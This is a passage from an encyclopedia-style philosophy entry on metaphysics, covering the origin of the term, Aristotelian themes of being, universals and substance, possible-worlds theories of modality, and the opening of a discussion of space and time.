The first three sections of this entry examine a broad selection of problems considered to be metaphysical and discuss ways in which the purview of metaphysics has expanded over time. We shall see that the central problems of metaphysics were significantly more unified in the Ancient and Medieval eras. Which raises a question—is there any common feature that unites the problems of contemporary metaphysics? The final two sections discuss some recent theories of the nature and methodology of metaphysics. We will also consider arguments that metaphysics, however defined, is an impossible enterprise.
- 1. The Word ‘Metaphysics’ and the Concept of Metaphysics
- 2. The Problems of Metaphysics: the “Old” Metaphysics
- 3. The Problems of Metaphysics: the “New” Metaphysics
- 4. The Methodology of Metaphysics
- 5. Is Metaphysics Possible?
- Academic Tools
- Other Internet Resources
- Related Entries
1. The Word ‘Metaphysics’ and the Concept of Metaphysics
The word ‘metaphysics’ is notoriously hard to define. Twentieth-century coinages like ‘meta-language’ and ‘metaphilosophy’ encourage the impression that metaphysics is a study that somehow “goes beyond” physics, a study devoted to matters that transcend the mundane concerns of Newton and Einstein and Heisenberg. This impression is mistaken. The word ‘metaphysics’ is derived from a collective title of the fourteen books by Aristotle that we currently think of as making up Aristotle's Metaphysics. Aristotle himself did not know the word. (He had four names for the branch of philosophy that is the subject-matter of Metaphysics: ‘first philosophy’, ‘first science’, ‘wisdom’, and ‘theology’.) At least one hundred years after Aristotle's death, an editor of his works (in all probability, Andronicus of Rhodes) titled those fourteen books “Ta meta ta phusika”—“the after the physicals” or “the ones after the physical ones”—the “physical ones” being the books contained in what we now call Aristotle's Physics. The title was probably meant to warn students of Aristotle's philosophy that they should attempt Metaphysics only after they had mastered “the physical ones”, the books about nature or the natural world—that is to say, about change, for change is the defining feature of the natural world.
This is the probable meaning of the title because Metaphysics is about things that do not change. In one place, Aristotle identifies the subject-matter of first philosophy as “being as such”, and, in another as “first causes”. It is a nice—and vexed—question what the connection between these two definitions is. Perhaps this is the answer: The unchanging first causes have nothing but being in common with the mutable things they cause. Like us and the objects of our experience—they are, and there the resemblance ceases. (For a detailed and informative recent guide to Aristotle's Metaphysics, see Politis 2004.)
Should we assume that ‘metaphysics’ is a name for that “science” which is the subject-matter of Aristotle's Metaphysics? If we assume this, we should be committed to something in the neighborhood of the following theses:
- The subject-matter of metaphysics is “being as such”
- The subject-matter of metaphysics is the first causes of things
- The subject-matter of metaphysics is that which does not change
Any of these three theses might have been regarded as a defensible statement of the subject-matter of what was called ‘metaphysics’ until the seventeenth century. But then, rather suddenly, many topics and problems that Aristotle and the Medievals would have classified as belonging to physics (the relation of mind and body, for example, or the freedom of the will, or personal identity across time) began to be reassigned to metaphysics. One might almost say that in the seventeenth century metaphysics began to be a catch-all category, a repository of philosophical problems that could not be otherwise classified as epistemology, logic, ethics or other branches of philosophy. (It was at about that time that the word ‘ontology’ was invented—to be a name for the science of being as such, an office that the word ‘metaphysics’ could no longer fill.) The academic rationalists of the post-Leibnizian school were aware that the word ‘metaphysics’ had come to be used in a more inclusive sense than it had once been. Christian Wolff attempted to justify this more inclusive sense of the word by this device: while the subject-matter of metaphysics is being, being can be investigated either in general or in relation to objects in particular categories. He distinguished between ‘general metaphysics’ (or ontology), the study of being as such, and the various branches of ‘special metaphysics’, which study the being of objects of various special sorts, such as souls and material bodies. (He does not assign first causes to general metaphysics, however: the study of first causes belongs to natural theology, a branch of special metaphysics.) It is doubtful whether this maneuver is anything more than a verbal ploy. In what sense, for example, is the practitioner of rational psychology (the branch of special metaphysics devoted to the soul) engaged in a study of being? Do souls have a different sort of being from that of other objects?—so that in studying the soul one learns not only about its nature (that is, its properties: rationality, immateriality, immortality, its capacity or lack thereof to affect the body …), but also about its “mode of being”, and hence learns something about being? It is certainly not true that all, or even very many, rational psychologists said anything, qua rational psychologists, that could plausibly be construed as a contribution to our understanding of being.
Perhaps the wider application of the word ‘metaphysics’ was due to the fact that the word ‘physics’ was coming to be a name for a new, quantitative science, the science that bears that name today, and was becoming increasingly inapplicable to the investigation of many traditional philosophical problems about changing things (and of some newly discovered problems about changing things).
Whatever the reason for the change may have been, it would be flying in the face of current usage (and indeed of the usage of the last three or four hundred years) to stipulate that the subject-matter of metaphysics was to be the subject-matter of Aristotle's Metaphysics. It would, moreover, fly in the face of the fact that there are and have been paradigmatic metaphysicians who deny that there are first causes—this denial is certainly a metaphysical thesis in the current sense—others who insist that everything changes (Heraclitus and any more recent philosopher who is both a materialist and a nominalist), and others still (Parmenides and Zeno) who deny that there is a special class of objects that do not change. In trying to characterize metaphysics as a field, the best starting point is to consider the myriad topics traditionally assigned to it.
2. The Problems of Metaphysics: the “Old” Metaphysics
2.1 Being As Such, First Causes, Unchanging Things
If metaphysics now considers a wider range of problems than those studied in Aristotle's Metaphysics, those original problems continue to belong to its subject-matter. For instance, the topic of “being as such” (and “existence as such”, if existence is something other than being) is one of the matters that belong to metaphysics on any conception of metaphysics. The following theses are all paradigmatically metaphysical:
- “Being is; not-being is not” [Parmenides];
- “Essence precedes existence” [Avicenna, paraphrased];
- “Existence in reality is greater than existence in the understanding alone” [St Anselm, paraphrased];
- “Existence is a perfection” [Descartes, paraphrased];
- “Being is a logical, not a real predicate” [Kant, paraphrased];
- “Being is the most barren and abstract of all categories” [Hegel, paraphrased];
- “Affirmation of existence is in fact nothing but denial of the number zero” [Frege];
- “Universals do not exist but rather subsist or have being” [Russell, paraphrased];
- “To be is to be the value of a bound variable” [Quine].
It seems reasonable, moreover, to say that investigations into non-being belong to the topic “being as such” and thus belong to metaphysics. (This did not seem reasonable to Meinong, who wished to confine the subject-matter of metaphysics to “the actual” and who therefore did not regard his Theory of Objects as a metaphysical theory. According to the conception of metaphysics adopted in this article, however, his thesis [paraphrased] “Predication is independent of being” is paradigmatically metaphysical.)
The topics “the first causes of things” and “unchanging things”—have continued to interest metaphysicians, though they are not now seen as having any important connection with the topic “being as such”. The first three of Aquinas's Five Ways are metaphysical arguments on any conception of metaphysics. Additionally the thesis that there are no first causes and the thesis that there are no things that do not change count as metaphysical theses, for in the current conception of metaphysics, the denial of a metaphysical thesis is a metaphysical thesis. No post-Medieval philosopher would say anything like this:
I study the first causes of things, and am therefore a metaphysician. My colleague Dr McZed denies that there are any first causes and is therefore not a metaphysician; she is rather, an anti-metaphysician. In her view, metaphysics is a science with a non-existent subject-matter, like astrology.
This feature of the contemporary conception of metaphysics is nicely illustrated by a statement of Sartre's:
I do not think myself any less a metaphysician in denying the existence of God than Leibniz was in affirming it. (1949: 139)
An anti-metaphysician in the contemporary sense is not a philosopher who denies that there are objects of the sorts that an earlier philosopher might have said formed the subject-matter of metaphysics (first causes, things that do not change, universals, substances, …), but rather a philosopher who denies the legitimacy of the question whether there are objects of those sorts.
The three original topics—the nature of being; the first causes of things; things that do not change—remained topics of investigation by metaphysicians after Aristotle. Another topic, discussed in the following subsection, occupies an intermediate position between Aristotle and his successors.
2.2 Categories of Being and Universals
We human beings sort things into various classes. And we often suppose that the classes into which we sort things enjoy a kind of internal unity. In this respect they differ from sets in the strict sense of the word. (And no doubt in others. It would seem, for example, that we think of the classes we sort things into—biological species, say—as comprising different members at different times.) The classes into which we sort things are in most cases “natural” classes, classes whose membership is in some important sense uniform—“kinds”. We shall not attempt an account or definition of ‘natural class’ here. Examples must suffice. There are certainly sets whose members do not make up natural classes: a set that contains all dogs but one, and a set that contains all dogs and exactly one cat do not correspond to natural classes in anyone's view. And it is tempting to suppose that there is a sense of “natural” in which dogs make up a natural class, to suppose that in dividing the world into dogs and non-dogs, we “cut nature at the joints”. It is, however, a respectable philosophical thesis that the idea of a natural class cannot survive philosophical scrutiny. If that respectable thesis is true, the topic “the categories of being” is a pseudo-topic. Let us simply assume that the respectable thesis is false and that things fall into various natural classes—hereinafter, simply classes.
Some of the classes into which we sort things are more comprehensive than others: all dogs are animals, but not all animals are dogs; all animals are living organisms, but not all living organisms are animals …. Now the very expression “sort things into classes” suggests that there is a most comprehensive class: the class of things, the class of things that can be sorted into classes. But is this so?—and if it is so, are there classes that are “just less comprehensive” than this universal class? If there are, can we identify them?—and are there a vast (perhaps even an infinite) number of them, or some largish, messy number like forty-nine, or some small, neat number like seven or four? Let us call any such less comprehensive classes the ‘categories of being’ or the ‘ontological categories’. (The former term, if not the latter, presupposes a particular position on one question about the nature of being: that everything is, that the universal class is the class of beings, the class of things that are. It thus presupposes that Meinong was wrong to say that “there are things of which it is true that there are no such things”.)
The topic “the categories of being” is intermediate between the topic “the nature of being” and the topics that fall under the post-Medieval conception of metaphysics for a reason that can be illustrated by considering the problem of universals. Universals, if they indeed exist, are, in the first instance, properties or qualities or attributes (i.e., “ductility” or “whiteness”) that are supposedly universally “present in” the members of classes of things and relations (i.e., “being to the north of”) that are supposedly universally present in the members of classes of sequences of things. “In the first instance”: it may be that things other than qualities and relations are universals, although qualities and relations are the items most commonly put forward as examples of universals. It may be that the novel War and Peace is a universal, a thing that is in some mode present in each of the many tangible copies of the novel. It may be that the word “horse” is a universal, a thing that is present in each of the many audible utterances of the word. And it may be that natural classes or kinds are themselves universals—it may be that there is such a thing as “the horse” or the species Equus caballus, distinct from its defining attribute “being a horse” or “equinity”, and in some sense “present in” each horse. (Perhaps some difference between the attribute “being a horse” and the attribute “being either a horse or a kitten” explains why the former is the defining attribute of a kind and the latter is not. Perhaps the former attribute exists and the latter does not; perhaps the former has the second-order attribute “naturalness” and the latter does not; perhaps the former is more easily apprehended by the intellect than the latter.)
The thesis that universals exist—or at any rate “subsist” or “have being”—is variously called ‘realism’ or ‘Platonic realism’ or ‘platonism’. All three terms are objectionable. Aristotle believed in the reality of universals, but it would be at best an oxymoron to call him a platonist or a Platonic realist. And ‘realism’ tout court has served as a name for a variety of philosophical theses. The thesis that universals do not exist—do not so much as subsist; have no being of any sort—is generally called ‘nominalism’. This term, too is objectionable. At one time, those who denied the existence of universals were fond of saying things like:
There is no such thing as “being a horse”: there is only the name [nomen, gen. nominis] “horse”, a mere flatus vocis [puff of sound].
Present-day nominalists, however, are aware, if earlier nominalists were not, that if the phrase ‘the name “horse” ’ designated an object, the object it designated would itself be a universal or something very like one. It would not be a mere puff of sound but would rather be what was common to the many puffs of sound that were its tokens.
The old debate between the nominalists and the realists continues to the present day. Most realists suppose that universals constitute one of the categories of being. This supposition could certainly be disputed without absurdity. Perhaps there is a natural class of things to which all universals belong but which contains other things as well (and is not the class of all things). Perhaps, for example, numbers and propositions are not universals, and perhaps numbers and propositions and universals are all members of a class of “abstract objects”, a class that some things do not belong to. Or perhaps there is such a thing as “the whiteness of the Taj Mahal” and perhaps this object and the universal “whiteness”—but not the Taj Mahal itself—both belong to the class of “properties”. Let us call such a class—a proper subclass of an ontological category, a natural class that is neither the class of all things nor one of the ontological categories—an ‘ontological sub-category’. It may indeed be that universals make up a sub-category of being and are members of the category of being “abstract object”. But few if any philosophers would suppose that universals were members of forty-nine sub-categories—much less of a vast number or an infinity of sub-categories. Most philosophers who believe in the reality of universals would want to say that universals, if they do not constitute an ontological category, at least constitute one of the “higher” sub-categories. If dogs form a natural class, this class is—by the terms of our definition—an ontological sub-category. And this class will no doubt be a subclass of many sub-categories: the genus canis, the class (in the biological sense) mammalia, …, and so through a chain of sub-categories that eventually reaches some very general sub-category like “substance” or “material object”. Thus, although dogs may compose an ontological sub-category, this sub-category—unlike the category “universal”—is one of the “lower” ones. These reflections suggest that the topic “the categories of being” should be understood to comprehend both the categories of being sensu stricto and their immediate sub-categories.
Does the topic “the categories of being” belong to metaphysics in the “old” sense? A case can be made for saying that it does, based on the fact that Plato's theory of forms (universals, attributes) is a recurrent theme in Aristotle's Metaphysics. In Metaphysics, two of Plato's central theses about the forms come in for vigorous criticism: (i) that things that would, if they existed, be “inactive” (the forms) could be the primary beings, the “most real” things, and (ii) that the attributes of things exist “separately” from the things whose attributes they are. We shall be concerned only with (ii). In the terminology of the Schools, that criticism can be put this way: Plato wrongly believed that universals existed ante res (prior to objects); the correct view is that universals exist in rebus (in objects). It is because this aspect of the problem of universals—whether universals exist ante res or in rebus—is discussed at length in Metaphysics, that a strong case can be made for saying that the problem of universals falls under the old conception of metaphysics. (And the question whether universals, given that they exist at all, exist ante res or in rebus is as controversial in the twenty-first century as it was in the thirteenth century and the fourth century B.C.E.) If we do decide that the problem of universals belongs to metaphysics on the old conception, then, since we have liberalized the old conception by applying to it the contemporary rule that the denial of a metaphysical position is to be regarded as a metaphysical position, we shall have to say that the question whether universals exist at all is a metaphysical question under the old conception—and that nominalism is therefore a metaphysical thesis.
There is, however, also a case to made against classifying the problem of universals as a problem of metaphysics in the (liberalized) old sense. For there is more to the problem of universals than the question whether universals exist and the question whether, if they do exist, their existence is ante res or in rebus. For example, the problem of universals also includes questions about the relation between universals (if such there be) and the things that are not universals, the things usually called particulars. Aristotle did not consider these questions in the Metaphysics. One might therefore plausibly contend that only one part of the problem of universals (the part that pertains to the existence and nature of universals) belongs to metaphysics in the old sense. At one time, a philosopher might have said,
The universal “doghood” is a thing that does not change. Therefore, questions about its nature belong to metaphysics, the science of things that do not change. But dogs are things that change. Therefore, questions concerning the relation of dogs to doghood do not belong to metaphysics.
But no contemporary philosopher would divide the topics that way—not even if he or she believed that doghood existed and was a thing that did not change. A contemporary philosopher—if that philosopher concedes that there is any problem that can properly be called “the problem of universals”—will see the problem of universals as a problem properly so called, as a problem having the kind of internal unity that leads philosophers to speak of a philosophical problem. And the same point applies to the topic “the categories of being”: every philosopher who is willing to say that “What are the categories of being?” is a meaningful question will assign every aspect of that question to metaphysics
Let us consider some aspects of the problem of universals that concern changing things. (That is, that concern particulars—for even if there are particulars that do not change, most of the particulars that figure in discussions of the problem of universals as examples are things that change.) Consider two white particulars—the Taj Mahal, say, and the Washington Monument. And suppose that both these particulars are white in virtue of (i.e., their being white consists in) their bearing some one, identifiable relation to the universal “whiteness”. Suppose further that we are able to single out this relation by some sort of act of intellectual attention or abstraction, and that (having done so) we have given it the name “falling under”. All white things and only white things fall under whiteness, and falling under whiteness is what it is to be white. (We pass over many questions that would have to be addressed if we were discussing the problem of universals for its own sake. For example, both blueness and redness are spectral color-properties, and whiteness is not. Does this fact imply that “being a spectral color-property” is, as one might say, a second-order universal? If so, does blueness “fall under” this universal in the same sense as the sense in which a copy of Philosophical Studies falls under blueness?)
Now what can we say about this relation, this “falling under”? What is it about the two objects whiteness and the Taj Mahal that is responsible for the fact that the latter falls under the former? Is the Taj perhaps a “bundle” of universalia ante res, and does it fall under whiteness in virtue of the fact that whiteness is one of the universals that is a constituent of the bundle that it is? Or might it be that a particular like the Taj, although it indeed has universals as constituents, is something more than its universal constituents? Might it be that the Taj has a constituent that is not a universal, a “substrate”, a particular that is in some sense property-less and that holds the universal constituents of the Taj together—that “bundles” them? (If we take that position, then we may want to say, with Armstrong (1989: 94–96), that the Taj is a ‘thick particular’ and its substrate a ‘thin particular’: a thick particular being a thin particular taken together with the properties it bundles.) Or might the Taj have constituents that are neither universals nor substrates? Might we have been too hasty when we defined ‘particulars’ as things that are not universals? Could there perhaps be two kinds of non-universals, concrete non-universals or concrete individuals (those would be the particulars, thick or thin), and abstract non-universals or abstract individuals (‘accidents’ or ‘tropes’ or ‘property instances’), things that are properties or qualities (and relations as well), things like “the (individual) whiteness of the Taj Mahal”? Is the Taj perhaps a bundle not of universals but of accidents? Or is it composed of a substrate and a bundle of accidents? And we cannot neglect the possibility that Aristotle was right and that universals exist only in rebus. If that is so, we must ask what the relation is between the matter that composes a particular and the universals that inhere in it—that inhere simultaneously in “this” matter and in “that” matter.
The series of questions that was set out in the preceding paragraph was introduced by observing that the problem of universals includes both questions about the existence and nature of universals and questions about how universals are related to the particulars that fall under them. Many of the theories that were alluded to in that series of questions could be described as theories of the “ontological structure” of non-universals. We can contrast ontological structure with mereological structure. A philosophical question concerns the mereological structure of an object if it is a question about the relation between that object and those of its constituents that belong to the same ontological category as the object. For example, the philosopher who asks whether the Taj Mahal has a certain block of marble among its constituents essentially or only accidentally is asking a question about the mereological structure of the Taj, since the block and the building belong to the same ontological category. But the philosopher who asks whether the Taj has “whiteness” as a constituent and the philosopher who supposes that the Taj does have this property-constituent and asks, “What is the nature of this relation ‘constituent of’ that ‘whiteness’ bears to the Taj?” are asking questions about its ontological structure.
Many philosophers have supposed that particulars fall under universals by somehow incorporating them into their ontological structure. And other philosophers have supposed that the ontological structure of a particular incorporates individual properties or accidents—and that an accident is an accident of a certain particular just in virtue of being a constituent of that particular.
Advocates of the existence of ante res universals, and particularly those who deny that these universals are constituents of particulars, tend to suppose that universals abound—that there is not only such a universal as whiteness but such a universal as “being both white and round and either shiny or not made of silver”. Advocates of other theories of universals are almost always less liberal in the range of universals whose existence they will allow. The advocate of in rebus universals is unlikely to grant the existence of “being both white and round and either shiny or not made of silver”, even in the case in which there is an object that is both white and round and either shiny or not made of silver (such as a non-shiny white plastic ball).
The two topics “the categories of being” and “the ontological structure of objects” are intimately related to each other and to the problem of universals. It is not possible to propose a solution to the problem of universals that does not have implications for the topic “the categories of being”. (Even nominalism implies that at least one popular candidate for the office “ontological category” is non-existent or empty.) It is certainly possible to maintain that there are ontological categories that are not directly related to the problem of universals (“proposition”, “state of affairs”, “event”, “mere possibile”), but any philosopher who maintains this will nevertheless maintain that if there are universals they make up at least one of the higher ontological sub-categories. And it seems that it is possible to speak of ontological structure only if one supposes that there are objects of different ontological categories. So whatever metaphysics comprehends, it must comprehend every aspect of the problem of universals and every aspect of the topics “the categories of being” and “the ontological structure of objects”. For a recent investigation of the problems that have been discussed in this section, see Lowe (2006).
We turn now to a topic that strictly speaking belongs to “the categories of being”, but which is important enough to be treated separately.
Some things (if they exist at all) are present only “in” other things: a smile, a haircut (product, not process), a hole …. Such things may be opposed to things that exist “in their own right”. Metaphysicians call the things that exist in their own right ‘substances’. Aristotle called them ‘protai ousiai’ or “primary beings”. They make up the most important of his ontological categories. Several features define protai ousiai: they are subjects of predication that cannot themselves be predicated of things (they are not universals); things exist “in” them, but they do not exist “in” things (they are not accidents like Socrates' wisdom or his ironic smile); they have determinate identities (essences). This last feature could be put this way in contemporary terms: if the prote ousia x exists at a certain time and the prote ousia y exists at some other time, it makes sense to ask whether x and y are the same, are numerically identical (and the question must have a determinate answer); and the question whether a given prote ousia would exist in some set of counterfactual circumstances must likewise have an answer (at least if the circumstances are sufficiently determinate—if, for example, they constitute a possible world. More on this in the next section). It is difficult to suppose that smiles or holes have this sort of determinate identity. To ask whether the smile Socrates smiled today is the smile he smiled yesterday (or is the smile he would have smiled if Crito had asked one of his charmingly naïve questions) can only be a question about descriptive identity.
Aristotle uses ‘(prote) ousia’ not only as a count-noun but as a mass term. (He generally writes ‘ousia’ without qualification when he believes that the context will make it clear that he means ‘prote ousia’.) For example, he not only asks questions like “Is Socrates a (prote) ousia?” and “What is a (prote) ousia”?, but questions like “What is the (prote) ousia of Socrates?” and “What is (prote) ousia?” (Which question he is asking sometimes has to be inferred from the context, since there is no indefinite article in Greek.) In the count-noun sense of the term, Aristotle identifies at least some (protai) ousiai with ta hupokeimena or “underlying things”. Socrates, for example, is a hupokeimenon in that he “lies under” the in rebus universals under which he falls and the accidents that inhere in him. ‘To hupokeimenon’ has an approximate Latin equivalent in ‘substantia’, “that which stands under”. (Apparently, “to stand under” and “to lie under” are equally good metaphorical descriptions of the relations a thing bears to its qualities and accidents.) Owing both to the close association of (protai) ousiai and hupokeimena in Aristotle's philosophy and to the absence of a suitable Latin equivalent of ‘ousia’ ‘substantia’ became the customary Latin translation of the count-noun ‘(prote) ousia’.
The question whether there in fact are substances continues to be one of the central questions of metaphysics. Several closely related questions are: How, precisely, should the concept of substance be understood?; Which of the items (if any of them) among those we encounter in everyday life are substances?; If there are substances at all, how many of them are there?—is there only one as Spinoza contended, or are there many as most of the rationalists supposed?; What kinds of substances are there?—are there immaterial substances, eternal substances, necessarily existent substances?
It must be emphasized that there is no universally accepted and precise definition of ‘substance’. Depending on how one understood the word (or the concept) one might say either that Hume denied that there were any substances or that he held that the only substances (or the only substances of which we have any knowledge) were impressions and ideas. It would seem, however, that most philosophers who are willing to use the word ‘substance’ at all would deny that any of the following (if they exist) are substances:
- Universals and other abstract objects. (It should be noted that Aristotle criticized Plato for supposing that the protai ousiai were ante res universals.)
- Events, processes, or changes. (But some metaphysicians contend that substance/event is a false dichotomy.)
- Stuffs, such as flesh or iron or butter. (Unfortunately for beginning students of metaphysics, the usual meaning of ‘substance’ outside philosophy is stuff. Aristotle criticized “the natural philosophers” for supposing that the prote ousia could be a stuff—water or air or fire or matter.)
The nature of being, the problem of universals, and the nature of substance have been recognized as topics that belong to “metaphysics” by almost everyone who has used the word. We now turn to topics that belong to metaphysics only in the post-Medieval sense.
3. The Problems of Metaphysics: the “New” Metaphysics
Philosophers have long recognized that there is an important distinction within the class of true propositions: the distinction between those propositions that might have been false and those that could not have been false (those that must be true). Compare, for example, the proposition that Paris is the capital of France and the proposition that there is a prime between every number greater than 1 and its double. Both are true, but the former could have been false and the latter could not have been false. Likewise, there is a distinction to be made within the class of false propositions: between those that could have been true and those that could not have been true (those that had to be false).
Some Medieval philosophers supposed that the fact that true propositions are of the two sorts “necessarily true” and “contingently true” (and the corresponding fact about false propositions) showed that there were two “modes” in which a proposition could be true (or false): the mode of contingency and the mode of necessity—hence the term ‘modality’. Present-day philosophers retain the Medieval term ‘modality’ but now it means no more than “pertaining to possibility and necessity”. The types of modality of interest to metaphysicians fall into two camps: modality de re and modality de dicto.
Modality de dicto is the modality of propositions (‘dictum’ means proposition, or close enough). If modality were coextensive with modality de dicto, it would be at least a defensible position that the topic of modality belongs to logic rather than to metaphysics. (Indeed, the study of modal logics goes back to Aristotle's Prior Analytics.)
But many philosophers also think there is a second kind of modality, modality de re—the modality of things. (The modality of substances, certainly, and perhaps of things in other ontological categories.) The status of modality de re is undeniably a metaphysical topic, and we assign it to the “new” metaphysics because, although one can ask modal questions about things that do not change—God, for example, or universals—a large proportion of the work that has been done in this area concerns the modal features of changing things.
There are two types of modality de re. The first concerns the existence of things—of human beings, for example. If Sally, an ordinary human being, says, “I might not have existed”, almost everyone will take her to have stated an obvious truth. And if what she has said is indeed true, then she exists contingently. That is to say, she is a contingent being: a being who might not have existed. A necessary being, in contrast, is a being of which it is false that it might not have existed. Whether any objects are necessary beings is an important question of modal metaphysics. Some philosophers have gone so far to maintain that all objects are necessary beings, since necessary existence is a truth of logic in what seems to them to be the best quantified modal logic. (See Barcan 1946 for the first modern connection between necessary existence and quantified modal logic. Barcan did not draw any metaphysical conclusions from her logical results, but later authors, especially Williamson 2013 have.)
The second kind of modality de re concerns the properties of things. Like the existence of things, the possession of properties by things is subject to modal qualification. If Sally, who speaks English, says, “I might have spoken only French”, almost everyone will take that statement to be no less obviously true than her statement that she might not have existed. And if what she has said is indeed true, then “speaking English” is a property that she has only contingently or (the more usual word) only accidentally. Additionally there may be properties which some objects have essentially. A thing has a property essentially if it could not exist without having that property. Examples of essential properties tend to be controversial, largely because the most plausible examples of a certain object's possessing a property essentially are only as plausible as the thesis that that object possesses those properties at all. For example, if Sally is a physical object, as physicalists suppose, then it is very plausible for them to suppose further that she is essentially a physical object—but it is controversial whether they are right to suppose that she is a physical object. And, of course, the same thing can be said, mutatis mutandis, concerning dualists and the property of being a non-physical object. It would seem, however, that Sally is either essentially a physical object or essentially a non-physical object. And many find it plausible to suppose that (whether she is physical or non-physical) she has the property “not being a poached egg” essentially.
The most able and influential enemy of modality (both de dicto and de re) was W. V. Quine, who vigorously defended both the following theses. First, that modality de dicto can be understood only in terms of the concept of analyticity (a problematical concept in his view). Secondly, that modality de re cannot be understood in terms of analyticity and therefore cannot be understood at all. Quine argued for this latter claim by proposing what he took to be decisive counterexamples to theories that take essentiality to be meaningful. If modality de re makes any sense, Quine contended (1960: 199–200), cyclists must be regarded as essentially bipedal—for “Cyclists are bipedal” would be regarded as an analytic sentence by those who believe in analyticity. But mathematicians are only accidentally bipedal (“Mathematicians are bipedal” is not analytic by anyone's lights). What then, Quine proceeded to ask, of someone who is both a mathematician and a cyclist?—that person seems both essentially and only accidentally bi-pedal. Since this is incoherent, Quine thought that modality de re is incoherent.
Most philosophers are now convinced, however, that Quine's “mathematical cyclist” argument has been adequately answered by Saul Kripke (1972), Alvin Plantinga (1974) and various other defenders of modality de re. Kripke and Plantinga's defenses of modality are paradigmatically metaphysical (except insofar as they directly address Quine's linguistic argument). Both make extensive use of the concept of a possible world in defending the intelligibility of modality (both de re and de dicto). Leibniz was the first philosopher to use ‘possible world’ as a philosophical term of art, but Kripke's and Plantinga's use of the phrase is different from his. For Leibniz, a possible world was a possible creation: God's act of creation consists in his choosing one possible world among many to be the one world that he creates—the “actual” world. For Kripke and Plantinga, however, a possible world is a possible “whole of reality”. For Leibniz, God and his actions “stand outside” all possible worlds. For Kripke and Plantinga, no being, not even God, could stand outside the whole system of possible worlds. A Kripke-Plantinga (KP) world is an abstract object of some sort. Let us suppose that a KP world is a possible state of affairs (this is Plantinga's idea; Kripke says nothing so definite). Consider any given state of affairs; let us say, Paris being the capital of France. This state of affairs obtains, since Paris is the capital of France. By contrast, the state of affairs Tours being the capital of France does not obtain. The latter state of affairs does, however, exist, for there is such a state of affairs. (Obtaining thus stands to states of affairs as truth stands to propositions: although the proposition that Tours is the capital of France is not true, there nevertheless is such a proposition.) The state of affairs x is said to include the state of affairs y if it is impossible for x to obtain and y not to obtain. If it is impossible for both x and y to obtain, then each precludes the other. A possible world is simply a possible state of affairs that, for every state of affairs x, either includes or precludes x; the actual world is the one such state of affairs that obtains.
Using the KP theory we can answer Quine's challenge as follows. In every possible world, every cyclist in that world is bipedal in that world. (Assuming with Quine that necessarily cyclists are bipedal. Apparently he had not foreseen adaptive bicycles.) Nevertheless for any particular cyclist, there is some possible world where he (the same person) is not bipedal. Once we draw this distinction, we can see that Quine's argument is invalid. More generally, on the KP theory, theses about de re essential properties need not be analytic; they are meaningful because they express claims about an object's properties in various possible worlds.
We can also use the notion of possible worlds to define many other modal concepts. For example, a necessarily true proposition is a proposition that would be true no matter what possible world was actual. Socrates is a contingent being if there is some possible world such that he would not exist if that world were actual, and he has the property “being human” essentially if every possible world that includes his existence also includes his being human. Kripke and Plantinga have greatly increased the clarity of modal discourse (and particularly of modal discourse de re), but at the expense of introducing a modal ontology, an ontology of possible worlds.
Theirs is not the only modal ontology on offer. The main alternative to the KP theory has been the ‘modal realism’ championed by David Lewis (1986). Lewis's modal ontology appeals to objects called possible worlds, but these “worlds” are concrete objects. What we call the actual world is one of these concrete objects, the spatiotemporally connected universe we inhabit. What we call “non-actual” worlds are other concrete universes that are spatiotemporally isolated from ours (and from each other). There is, Lewis contends, a vast array of non-actual worlds, an array that contains at least those worlds that are generated by an ingenious principle of recombination, a principle that can be stated without the use of modal language (1986: 87). For Lewis, moreover, “actual” is an indexical term: when I speak of the actual world, I refer to the world of which I am an inhabitant—and so for any speaker who is “in” (who is a part of) any world.
In the matter of modality de dicto, Lewis's theory proceeds in a manner that is at least parallel to the KP theory: there could be flying pigs if there are flying pigs in some possible world (if some world has flying pigs as parts). But the case is otherwise with modality de re. Since every ordinary object is in only one of the concrete worlds, Lewis must either say that each such object has all its properties essentially or else adopt a treatment of modality de re that is not parallel to the KP treatment. He chooses the latter alternative. Although Socrates is in only the actual world, Lewis holds, he has ‘counterparts’ in some other worlds, objects that play the role in those worlds that he plays in this world. If all Socrates' counterparts are human, then we may say that he is essentially human. If one of Hubert Humphrey's counterparts won (the counterpart of) the 1968 presidential election, it is correct to say of Humphrey that he could have won that election.
In addition to the obvious stark ontological contrast between the two theories, they differ in two important ways in their implications for the philosophy of modality. First, if Lewis is right, then modal concepts can be defined in terms of paradigmatically non-modal concepts, since ‘world’ and all of Lewis's other technical terms can be defined using only ‘is spatiotemporally related to’, ‘is a part of’ and the vocabulary of set theory. For Kripke and Plantinga, however, modal concepts are sui generis, indefinable or having only definitions that appeal to other modal concepts. Secondly, Lewis's theory implies a kind of anti-realism concerning modality de re. This is because there is no one relation that is the counterpart relation—there are rather various ways or respects in which one could say that objects in two worlds “play the same role” in their respective worlds. Socrates, therefore, may well have non-human counterparts under one counterpart relation and no non-human counterparts under another. And the choice of a counterpart relation is a pragmatic or interest-relative choice. But on the KP theory, it is an entirely objective question whether Socrates fails to be human in some world in which he exists: the answer must be Yes or No and is independent of human choices and interests.
Whatever one may think of these theories when one considers them in their own right (as theories of modality, as theories with various perhaps objectionable ontological commitments), one must concede that they are paradigmatically metaphysical theories. They bear witness to the resurgence of metaphysics in analytical philosophy in the last third of the twentieth century.
3.2 Space and Time
Long before the theory of relativity represented space and time as aspects of or abstractions from a single entity, spacetime, philosophers saw space and time as intimately related. (A glance through any dictionary of quotations suggests that the philosophical pairing of space and time reflects a natural, pre-philosophical tendency: “Had we but world enough, and time …”; “Dwellers all in time and space”.) Kant, for example, treated space and time in his Transcendental Aesthetic as things that should be explained by a single, unified theory. And his theory of space and time, revolutionary though it may have been in other respects, was in this respect typical of philosophical accounts of space and time. Whatever the source of the conviction that space and time are two members of a “species” (and the only two members of that species), they certainly raise similar philosophical questions. It can be asked whether space extends infinitely in every direction, and it can be asked whether time extends infinitely in either of the two temporal “directions”. Just as one can ask whether, if space is finite, it has an “end” (whether it is bounded or unbounded), one may ask of time whether, if it is finite, it had a beginning or will have an end or whether it might have neither, but rather be “circular” (be finite but unbounded). As one can ask whether there could be two extended objects that were not spatially related to each other, one can ask whether there could be two events that were not temporally related to each other. One can ask whether space is (a) a real thing—a substance—a thing that exists independently of its inhabitants, or (b) a mere system of relations among those inhabitants. And one can ask the same question about time.
But there are also questions about time that have no spatial analogues—or at least no obvious and uncontroversial analogues. There are, for example, questions about the grounds of various asymmetries between the past and the future—why is our knowledge of the past better than our knowledge of the future?; why do we regard an unpleasant event that is about to happen differently from the way we regard an unpleasant event that has recently happened?; why does causation seem to have a privileged temporal direction? There do not seem to be objective asymmetries like this in space.
